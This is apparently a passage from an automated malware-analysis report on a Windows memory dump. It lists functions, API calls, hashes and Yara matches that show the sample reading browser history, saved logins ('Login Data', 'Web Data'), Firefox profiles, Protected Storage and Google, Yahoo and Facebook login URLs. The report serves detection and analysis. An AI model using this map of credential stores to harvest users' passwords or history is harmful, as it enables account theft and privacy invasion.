                                                  • String ID: J$Microsoft_WinInet$Microsoft_WinInet_
                                                  • API String ID: 1313344744-1864008983
                                                  • Opcode ID: 212f3f294c9ab8b83a3dc136b78cffcc3e5b2f11c9e98eede468f190287508d3
                                                  • Instruction ID: ae9214853af189039b11f9ecdcfbf9e5a6a1e8940f9aa775dff38fc8017bd4cb
                                                  • Opcode Fuzzy Hash: 212f3f294c9ab8b83a3dc136b78cffcc3e5b2f11c9e98eede468f190287508d3
                                                  • Instruction Fuzzy Hash: E45129B5D00209AFDB20DFA4C981A9EB7F8FF08304F14446EE959F7241EB34A945CB19
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00442628, Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                  • String ID:
                                                  • API String ID: 2827331108-0
                                                  • Opcode ID: c0523eba28cc456e55dc8711b9221e28c9e3236c1c393efd04d0a35b8240f2f2
                                                  • Instruction ID: 706d3d187beade5fd8be42c29aa928e65c4a76933a7b40434c1f532ca5c4ff1d
                                                  • Opcode Fuzzy Hash: c0523eba28cc456e55dc8711b9221e28c9e3236c1c393efd04d0a35b8240f2f2
                                                  • Instruction Fuzzy Hash: 1E51C674C00305DFEB21AF64DA44AADB7B4FB05B15FA0422BF811A7291D7B84982CF5C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00409508, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040952C
                                                    • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                    • Part of subcall function 004090DF: memset.MSVCRT ref: 00409102
                                                    • Part of subcall function 004090DF: memset.MSVCRT ref: 0040911A
                                                    • Part of subcall function 004090DF: wcslen.MSVCRT ref: 00409136
                                                    • Part of subcall function 004090DF: wcslen.MSVCRT ref: 00409145
                                                    • Part of subcall function 004090DF: wcslen.MSVCRT ref: 0040918C
                                                    • Part of subcall function 004090DF: wcslen.MSVCRT ref: 0040919B
                                                    • Part of subcall function 004085EB: ??2@YAPAXI@Z.MSVCRT ref: 004085F4
                                                  • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 004095A1
                                                  • wcschr.MSVCRT ref: 004095B8
                                                  • wcschr.MSVCRT ref: 004095D8
                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 004095FD
                                                  • GetLastError.KERNEL32 ref: 00409607
                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 00409633
                                                  • FindCloseUrlCache.WININET(?), ref: 00409644
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CacheFindwcslen$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                  • String ID: visited:
                                                  • API String ID: 615219573-1702587658
                                                  • Opcode ID: 8f876ec4458d3f1ed4e4dc218a1084821821df0a90adecac85d6e07ab5b1aeff
                                                  • Instruction ID: 77a6c5406e07bb2a3f369751b76910ce3bd9900599f044f3c0855e39104cf3e1
                                                  • Opcode Fuzzy Hash: 8f876ec4458d3f1ed4e4dc218a1084821821df0a90adecac85d6e07ab5b1aeff
                                                  • Instruction Fuzzy Hash: 7F417F72D00219BBDB11DF95CD85A9EBBB8EF05714F10406AE505F7281DB38AF41CBA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00409A34, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00407EB8: free.MSVCRT(?,00408225,00000000,?,00000000), ref: 00407EBB
                                                    • Part of subcall function 00407EB8: free.MSVCRT(?,?,00408225,00000000,?,00000000), ref: 00407EC3
                                                    • Part of subcall function 00408037: free.MSVCRT(00000000,00408352,00000000,?,00000000), ref: 0040803E
                                                    • Part of subcall function 00409508: memset.MSVCRT ref: 0040952C
                                                    • Part of subcall function 00409508: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 004095A1
                                                    • Part of subcall function 00409508: wcschr.MSVCRT ref: 004095B8
                                                    • Part of subcall function 00409508: wcschr.MSVCRT ref: 004095D8
                                                    • Part of subcall function 00409508: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 004095FD
                                                    • Part of subcall function 00409508: GetLastError.KERNEL32 ref: 00409607
                                                    • Part of subcall function 00409657: memset.MSVCRT ref: 004096C7
                                                    • Part of subcall function 00409657: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,?,?,?,?,00000000,?), ref: 004096F5
                                                    • Part of subcall function 00409657: _wcsupr.MSVCRT ref: 0040970F
                                                    • Part of subcall function 00409657: memset.MSVCRT ref: 0040975E
                                                    • Part of subcall function 00409657: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,80000001,?,000000FF,?,?,?,?,00000000), ref: 00409789
                                                    • Part of subcall function 004038C4: LoadLibraryW.KERNEL32(advapi32.dll,?,00409AAA,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,0041018E,?,?), ref: 004038CF
                                                    • Part of subcall function 004038C4: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004038E3
                                                    • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 004038EF
                                                    • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 004038FB
                                                    • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403907
                                                    • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403913
                                                    • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 0040391F
                                                  • _wcslwr.MSVCRT ref: 00409AFC
                                                  • wcslen.MSVCRT ref: 00409B11
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$freememset$CacheEntryEnumFindValuewcschr$ErrorFirstLastLibraryLoadNext_wcslwr_wcsuprwcslen
                                                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                  • API String ID: 4091582287-4196376884
                                                  • Opcode ID: 3dd2327b6272305899ca924f4fa588c8789c804827c02355519b96a796539c20
                                                  • Instruction ID: 093a45ac9553ae88d2071121675ee446b985e814abadd75c8d2b77a0ae050712
                                                  • Opcode Fuzzy Hash: 3dd2327b6272305899ca924f4fa588c8789c804827c02355519b96a796539c20
                                                  • Instruction Fuzzy Hash: F731D872A1015466CB20BB6ACC4599F77A8AF80344B25087AF804B72C3CBBCEE45D699
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004090DF, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 00409102
                                                  • memset.MSVCRT ref: 0040911A
                                                    • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                  • wcslen.MSVCRT ref: 00409136
                                                  • wcslen.MSVCRT ref: 00409145
                                                  • wcslen.MSVCRT ref: 0040918C
                                                  • wcslen.MSVCRT ref: 0040919B
                                                    • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                    • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcslen$memset$FolderPathSpecialwcscatwcscpy
                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                  • API String ID: 2036768262-2114579845
                                                  • Opcode ID: 9b210f72750b98862afc15587b3a75268b6b997e6569292da8b093e0b4a2481a
                                                  • Instruction ID: 077c1189ed55963ee46c09665a9aee7869ceb3b17950e6b23e47196ee9b08e55
                                                  • Opcode Fuzzy Hash: 9b210f72750b98862afc15587b3a75268b6b997e6569292da8b093e0b4a2481a
                                                  • Instruction Fuzzy Hash: 0B21D972A4411D66E710E651DC85DDF73ACAF14354F5008BFF505E2082FAB89F844A6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00441683, Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 219COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                  • API String ID: 3510742995-2641926074
                                                  • Opcode ID: 12bdf7202536433b73b7b7e7b2d6f63e6cc165494f09a719a239059ada246e86
                                                  • Instruction ID: 3c8b5220aebea45aa68cfe54a9ecef019ebf38e5b75abdf02c998a5d3c6681b4
                                                  • Opcode Fuzzy Hash: 12bdf7202536433b73b7b7e7b2d6f63e6cc165494f09a719a239059ada246e86
                                                  • Instruction Fuzzy Hash: 8E71D4B1600301BFF310AF16DCC1A6ABB98BB45318F14452FF459DB252D7B9A8D18B99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040320A, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 116COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00402778: free.MSVCRT(00000000,0040E508,?,?,?,?,?,/deleteregkey,/savelangfile,?,?), ref: 0040277F
                                                    • Part of subcall function 00410168: memset.MSVCRT ref: 004101DA
                                                    • Part of subcall function 00410168: wcsrchr.MSVCRT ref: 004101F2
                                                    • Part of subcall function 00410168: memset.MSVCRT ref: 004102D9
                                                    • Part of subcall function 0040FF51: SetCurrentDirectoryW.KERNEL32(?,?,?,00403292,?), ref: 0040FF9E
                                                  • memset.MSVCRT ref: 0040330A
                                                  • memcpy.MSVCRT ref: 0040331C
                                                  • wcscmp.MSVCRT ref: 00403348
                                                  • _wcsicmp.MSVCRT ref: 00403385
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$CurrentDirectory_wcsicmpfreememcpywcscmpwcsrchr
                                                  • String ID: $J/@
                                                  • API String ID: 1763786148-830378395
                                                  • Opcode ID: 3e2635990ef3ae62cb2be14a81d094d65f482a135f1bd9a19b0151f057080487
                                                  • Instruction ID: 978c6ac20941b4c482f16f8c8dbf1af5ea5d331337d981433e161efedc4cfbbc
                                                  • Opcode Fuzzy Hash: 3e2635990ef3ae62cb2be14a81d094d65f482a135f1bd9a19b0151f057080487
                                                  • Instruction Fuzzy Hash: 36416B71A083819AD730DF61C945A9BB7E8AF85315F004C3FE88D93681EB7896498B5B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040EDFA, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040F026: memset.MSVCRT ref: 0040F042
                                                    • Part of subcall function 0040F026: memset.MSVCRT ref: 0040F057
                                                    • Part of subcall function 0040F026: wcscat.MSVCRT ref: 0040F080
                                                    • Part of subcall function 0040F026: wcscat.MSVCRT ref: 0040F0A9
                                                  • memset.MSVCRT ref: 0040EE42
                                                  • wcslen.MSVCRT ref: 0040EE59
                                                  • wcslen.MSVCRT ref: 0040EE61
                                                  • wcslen.MSVCRT ref: 0040EEBC
                                                  • wcslen.MSVCRT ref: 0040EECA
                                                    • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                    • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcslen$memsetwcscat$wcscpy
                                                  • String ID: history.dat$places.sqlite
                                                  • API String ID: 2541527827-467022611
                                                  • Opcode ID: 79052c9e259d4c4db0ec689992f98860fd40fbbfa98e25ce4c2c55694841dc80
                                                  • Instruction ID: 5a7552f2f2193819142f663f69cd0b376b18013dc8e05bcebec127321fadfdaa
                                                  • Opcode Fuzzy Hash: 79052c9e259d4c4db0ec689992f98860fd40fbbfa98e25ce4c2c55694841dc80
                                                  • Instruction Fuzzy Hash: AD315232D0411DAADF10EBA6D845ACDB3B8AF00319F6048BBE514F21C1E77CAA45CF59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00410075, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 80COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcslen$memsetwcscatwcscpy
                                                  • String ID: Login Data$Web Data
                                                  • API String ID: 3932597654-4228647177
                                                  • Opcode ID: 350975586496b093848a9f674fd33517dd62bead458e0c7f943732b3c3b83fa5
                                                  • Instruction ID: 391ffb8f75831278f4964df5f57522d74f6eb7522eeef9a3bb7e860aca09f0fd
                                                  • Opcode Fuzzy Hash: 350975586496b093848a9f674fd33517dd62bead458e0c7f943732b3c3b83fa5
                                                  • Instruction Fuzzy Hash: 3621B83294411C7BDB10AB55DC89ACA73ACAF10368F10487BF418E6181EBF9AEC48A5C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00415BAE, Relevance: 9.1, APIs: 6, Instructions: 140fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,-7FBEAA6E,00000003,00000000,?,?,00000000), ref: 00415C86
                                                  • CreateFileA.KERNEL32(?,-7FBEAA6E,00000003,00000000,00415512,00415512,00000000), ref: 00415C9E
                                                  • GetLastError.KERNEL32 ref: 00415CAD
                                                  • free.MSVCRT(?), ref: 00415CBA
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile$ErrorLastfree
                                                  • String ID:
                                                  • API String ID: 77810686-0
                                                  • Opcode ID: d3d8bbc7ba5a79f8a342b38920b53c153f9ef9857e0a0710124ad1068db44a69
                                                  • Instruction ID: e414679dc355763f7cb5844f7b2dc3c916de6b309c6ec43d815c5638ef366406
                                                  • Opcode Fuzzy Hash: d3d8bbc7ba5a79f8a342b38920b53c153f9ef9857e0a0710124ad1068db44a69
                                                  • Instruction Fuzzy Hash: 7741D0B1508701EFE7109F25EC4169BBBE5EFC4324F14892EF49596290E378D9848B96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040F026, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040F042
                                                  • memset.MSVCRT ref: 0040F057
                                                    • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                    • Part of subcall function 0040719A: wcslen.MSVCRT ref: 0040719B
                                                    • Part of subcall function 0040719A: wcscat.MSVCRT ref: 004071B3
                                                  • wcscat.MSVCRT ref: 0040F080
                                                    • Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
                                                    • Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
                                                    • Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E
                                                  • wcscat.MSVCRT ref: 0040F0A9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                  • API String ID: 1534475566-1174173950
                                                  • Opcode ID: b40f1a29007ee88b205eab30251de60a7177f83a5dcce95581a050599bf5dc33
                                                  • Instruction ID: 125a097a9f26af6413fbc01dcc411eb2579d6a3fd62fad3348166db73649eeaa
                                                  • Opcode Fuzzy Hash: b40f1a29007ee88b205eab30251de60a7177f83a5dcce95581a050599bf5dc33
                                                  • Instruction Fuzzy Hash: BF018EB294021C75DB207B668C86ECF732CDF45358F1044BEB504E7182D9B88E888AA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00412270, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004121C3: LoadLibraryW.KERNEL32(shell32.dll,0040E314,00000000,?,00000002), ref: 004121D1
                                                    • Part of subcall function 004121C3: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004121E6
                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                  • memset.MSVCRT ref: 004122C9
                                                  • RegCloseKey.ADVAPI32(?), ref: 00412330
                                                  • wcscpy.MSVCRT ref: 0041233E
                                                    • Part of subcall function 00407674: GetVersionExW.KERNEL32(00450DA8,0000001A,00412291), ref: 0040768E
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004122E4, 004122F4
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersionmemsetwcscpy
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                  • API String ID: 2699640517-2036018995
                                                  • Opcode ID: c9c64e8e2f051e8caefe2aaada980519e2fc3c71178caf599d8c015b906c46d2
                                                  • Instruction ID: c2720df25ff2a98c700ebd4409fa2125fd2182e4a6debc52b8ada4298b6a052e
                                                  • Opcode Fuzzy Hash: c9c64e8e2f051e8caefe2aaada980519e2fc3c71178caf599d8c015b906c46d2
                                                  • Instruction Fuzzy Hash: 29110831800114BAEB24E7599E4EEEF737CEB05304F5100E7F914E2151E6B85FE5969E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00411A13, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • wcschr.MSVCRT ref: 00411A2D
                                                  • _snwprintf.MSVCRT ref: 00411A52
                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,004495A0), ref: 00411A70
                                                  • GetPrivateProfileStringW.KERNEL32 ref: 00411A88
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                  • String ID: "%s"
                                                  • API String ID: 1343145685-3297466227
                                                  • Opcode ID: 1379250297118e4f09543b187cbc7d5db4505a0d7fe81e2b8f9beab2005c4772
                                                  • Instruction ID: ae5f1e9df6cd2f4a0780795b96407545f38e06b3c9618b8e9942ee44aab69889
                                                  • Opcode Fuzzy Hash: 1379250297118e4f09543b187cbc7d5db4505a0d7fe81e2b8f9beab2005c4772
                                                  • Instruction Fuzzy Hash: 2101283240521ABAEF219F81EC05FDA3A6AFF04785F104066BA1960161D779C661EB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00411140, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,004112EE,?,?,?,?,?,00000000,?), ref: 00411151
                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 0041116B
                                                  • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,004112EE,?,?,?,?,?,00000000,?), ref: 0041118E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                  • String ID: GetProcessTimes$kernel32.dll
                                                  • API String ID: 1714573020-3385500049
                                                  • Opcode ID: 464f22052b3d8a0ba402789ad02750f959a9c2b374b1230dcbafe23b26c1554b
                                                  • Instruction ID: be5b0e9885743e8d30da273d8ef78610b28524ab18dcfae55e11e98fa027414b
                                                  • Opcode Fuzzy Hash: 464f22052b3d8a0ba402789ad02750f959a9c2b374b1230dcbafe23b26c1554b
                                                  • Instruction Fuzzy Hash: 4FF01C35104308AFEB128FA0EC04B967BA9BB08749F048425F608C1671C775C9A0DF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041C9D5, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcmp
                                                  • String ID: @ $SQLite format 3
                                                  • API String ID: 1475443563-3708268960
                                                  • Opcode ID: 995df855505f47d3fff5b3ee1df3959e9c0b6b49e494aa249aa3272b4713cf3f
                                                  • Instruction ID: bd67d5102a3eb66ea4de4e64a8b31fca419cb069452d494a6197ab8253893597
                                                  • Opcode Fuzzy Hash: 995df855505f47d3fff5b3ee1df3959e9c0b6b49e494aa249aa3272b4713cf3f
                                                  • Instruction Fuzzy Hash: D351D1719442149FDF10DF69C8827EAB7F4AF44314F14019BE804EB346E778EA85CB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040E0AC, Relevance: 7.6, APIs: 5, Instructions: 64windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040E0CE
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040E0F7
                                                  • DeleteObject.GDI32(?), ref: 0040E129
                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,00000000,0040E36A), ref: 0040E171
                                                  • LoadIconW.USER32(00000000,00000065), ref: 0040E17A
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$DeleteHandleIconLoadModuleObject
                                                  • String ID:
                                                  • API String ID: 659443934-0
                                                  • Opcode ID: 5c24b57fa0e1cfdf7f3906394f540e2e73f2d4ee2212ac106c4666ba6c8c482e
                                                  • Instruction ID: 1cba439d4a63bd06fd13ecdd31e81b6a0d9710d4e5327182bdbee0994cb59d35
                                                  • Opcode Fuzzy Hash: 5c24b57fa0e1cfdf7f3906394f540e2e73f2d4ee2212ac106c4666ba6c8c482e
                                                  • Instruction Fuzzy Hash: 322193B19012989FDB30EF768C496DEB7A9AF84715F10863BF80CDB241DF794A118B58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00408FA4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00408B10: OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00408B85
                                                    • Part of subcall function 00408B10: GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00408BA4
                                                    • Part of subcall function 00408B10: DuplicateHandle.KERNEL32(00000000,00000104,00000000), ref: 00408BB1
                                                    • Part of subcall function 00408B10: GetFileSize.KERNEL32(00000000,00000000), ref: 00408BC6
                                                    • Part of subcall function 00408B10: CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00408BF0
                                                    • Part of subcall function 00408B10: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 00408C05
                                                    • Part of subcall function 00408B10: WriteFile.KERNEL32(?,00000000,00000104,004091EB,00000000), ref: 00408C20
                                                    • Part of subcall function 00408B10: UnmapViewOfFile.KERNEL32(00000000), ref: 00408C27
                                                    • Part of subcall function 00408B10: CloseHandle.KERNEL32(?), ref: 00408C30
                                                  • CloseHandle.KERNEL32(000000FF,000000FF,00000000,?,004091EB,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409074
                                                    • Part of subcall function 00408D9D: memset.MSVCRT ref: 00408E72
                                                    • Part of subcall function 00408D9D: wcschr.MSVCRT ref: 00408EAA
                                                    • Part of subcall function 00408D9D: memcpy.MSVCRT ref: 00408EDE
                                                  • DeleteFileW.KERNEL32(?,?,004091EB,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409095
                                                  • CloseHandle.KERNEL32(000000FF,?,004091EB,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 004090BC
                                                    • Part of subcall function 00408C67: memset.MSVCRT ref: 00408CAF
                                                    • Part of subcall function 00408C67: _snwprintf.MSVCRT ref: 00408D49
                                                    • Part of subcall function 00408C67: free.MSVCRT(000000FF,?,000000FF,00000000,00000104,74B5F560), ref: 00408D7D
                                                  Strings
                                                  • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 00408FB4
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat
                                                  • API String ID: 1979745280-1514811420
                                                  • Opcode ID: 296897d7b9fc56a1ed802aa42710325314df0d67c48e9c21b811ee4e31976f5b
                                                  • Instruction ID: f61eabc5127fffa0127996e1b9e76e3c42d0daca9916cdcd83e0194a9dfe4be1
                                                  • Opcode Fuzzy Hash: 296897d7b9fc56a1ed802aa42710325314df0d67c48e9c21b811ee4e31976f5b
                                                  • Instruction Fuzzy Hash: 10314CB1C006289BCF60DFA5CD855CEFBB8AF40315F1002ABA518B31A2DB756E85CF59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040CFDE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcsicmpqsort
                                                  • String ID: /nosort$/sort
                                                  • API String ID: 1579243037-1578091866
                                                  • Opcode ID: b8bcc0ce675c29f22b0227198f2ab65a41989cf9845e13ce1ccf23b6e43e1f16
                                                  • Instruction ID: 426287280b2395c37d482f654794667c251e21b6a2c3e86ec69022cc6db77350
                                                  • Opcode Fuzzy Hash: b8bcc0ce675c29f22b0227198f2ab65a41989cf9845e13ce1ccf23b6e43e1f16
                                                  • Instruction Fuzzy Hash: 4821F8317006019FD714AB75C981E55B3A9FF95318F01053EF519A72D2CB7ABC11CB9A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00409EB8, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004117E3: FreeLibrary.KERNELBASE(?,00409EC4,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 004117EF
                                                  • LoadLibraryW.KERNELBASE(pstorec.dll,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 00409EC9
                                                  • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00409EDC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc
                                                  • String ID: PStoreCreateInstance$pstorec.dll
                                                  • API String ID: 145871493-2881415372
                                                  • Opcode ID: 0c221e4a7068c4d6934d41343829b8b78c46c2a8619205bb2734fd8b0e3e91f3
                                                  • Instruction ID: b7b877f0cca51cf4ed89ca0d343beedc6eb81d3109fbfde12955c258fb57ec89
